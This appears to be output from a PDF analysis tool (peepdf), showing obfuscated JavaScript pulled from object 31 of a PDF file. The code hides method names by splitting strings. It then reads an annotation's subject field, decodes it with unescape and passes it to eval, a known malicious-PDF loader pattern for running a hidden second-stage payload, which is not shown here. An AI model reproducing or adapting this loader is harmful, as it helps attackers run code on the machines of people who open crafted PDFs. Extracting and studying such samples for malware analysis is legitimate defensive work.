// peepdf comment: Javascript code located in object 31 (version 0)

vd = '';
r = (r = 'l' + vd + 'a' + 'ce', 'rep' + r);
if (!vd && r) {
    var z;
    tis = event['tar' + vd + 'get'];
    var e = tis[vd + 'e' + vd + 'v' + 'al'];
    var y;
    z = y = tis;
    y = 0;
    sas = 'sync';
    sas += 'An' + vd + 'notS' + 'can';
    z[sas]();
    y = z;
    var p = y['g' + 'et' + 'Azots' [r](/z/, 'nn')]({
        nPage: 0
    });
    var s = p[0].subject;
    var l = s[r](/k /g, 'q%p' [r](/[qp]/g, ''));
    u = 'ca' + 'pe';
    u = 'u' + 'nes' + u;
    s = tis[u](l);
    e(s);
}

